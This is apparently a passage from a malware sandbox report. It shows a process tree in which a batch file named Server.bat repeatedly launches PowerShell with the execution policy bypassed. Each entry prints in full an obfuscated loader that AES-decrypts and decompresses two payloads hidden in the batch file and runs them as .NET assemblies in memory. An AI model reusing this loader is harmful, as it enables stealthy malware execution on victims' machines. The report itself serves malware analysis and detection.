        49⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3016
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        47⤵
        
        PID:2808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        48⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2880
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        46⤵
        
        PID:1472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        47⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2056
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        45⤵
        
        PID:1604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        46⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1260
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        44⤵
        
        PID:1076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        45⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1252
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        43⤵
        
        PID:2472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        44⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1740
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        42⤵
        
        PID:2408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        43⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2216
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        41⤵
        
        PID:2028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        42⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1516
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        40⤵
        
        PID:1244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        41⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1332
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        39⤵
        
        PID:2420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        40⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2624
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        38⤵
        
        PID:2664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        39⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1748
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        37⤵
        
        PID:3008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        38⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2284
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        36⤵
        
        PID:1108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        37⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1936
        
